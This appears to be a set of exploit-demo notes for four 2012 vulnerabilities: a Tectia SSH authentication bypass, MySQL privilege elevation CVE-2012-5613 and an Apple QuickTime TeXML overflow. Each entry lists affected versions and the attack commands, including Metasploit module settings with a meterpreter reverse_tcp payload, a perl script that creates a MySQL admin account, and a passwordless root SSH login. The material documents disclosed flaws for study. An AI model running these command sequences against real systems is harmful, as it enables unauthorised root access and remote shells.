Tectia SSH Server Authentication Bypass Metasploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01
Metasploit PoC on 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on CentOS 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH Server for Unix-based platforms. The bug is triggered by an SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request sent before password authentication, which allows any remote user to bypass the login routine and gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig

CVE-2012-5613 MySQL Database Privilege Elevation 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01

PoC provided by :

kingcope

Reference(s) :

CVE-2012-5613
Full Disclosure Mailing-list
Red Hat Bugzilla

Affected version(s) :

MySQL 5.0
MySQL 5.1
Others ?

Tested on CentOS 5.8 x86 with :

MySQL Server version 5.0.95 Source distribution

Description :

An attacker with access to a MySQL database through a user account holding some specific privileges can use this vulnerability to create a MySQL administrator user. The user created by the PoC script is, by default, “rootedbox2” with “rootedbox2” as password.

Commands :

On the target side :
CREATE DATABASE exampledb;
GRANT ALL PRIVILEGES ON exampledb.* TO user1@'192.168.178.26' IDENTIFIED BY 'test';
GRANT FILE ON *.* TO user1@'192.168.178.26' IDENTIFIED BY 'test';
FLUSH PRIVILEGES;

On the attacker side :
mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed
mysql -u rootedbox2 -h 192.168.178.34 -p -> denied
perl mysql_privilege_elevation.pl
mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01

PoC provided by :

kingcope

Reference(s) :

Full Disclosure Mailing-list

Affected version(s) :

All versions of Tectia SSH Server

Tested on CentOS 5.8 x86 with :

Tectia SSH Server 6.3.2.33

Description :

An attacker in possession of a valid username on an SSH Tectia installation running on UNIX (verified on AIX/Linux) can log in without a password. The bug is in the “SSH USERAUTH CHANGE REQUEST” routines, which exist to allow a user to change their password. A bug in that code allows an attacker to log in without a password by forcing a password change request prior to authentication.

Commands :

Your OpenSSH client should be patched with the diff file provided by kingcope in order to force the password change request.

On the target :

ifconfig
uname -a
rpm -qi ssh-tectia-server-6.3.2-33

netstat -lntp

On the attacker :

ifconfig
uname -a

./ssh -lroot 192.168.178.34

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinated public release of the vulnerability on 2012-11-05
Metasploit PoC provided by juan vazquez on 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is what this module uses to trigger the overflow. Because of QuickTime restrictions when handling font-table fields, only bytes 0x31-0x39 can be used in the overflow, so at the moment no DEP/ASLR bypass has been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo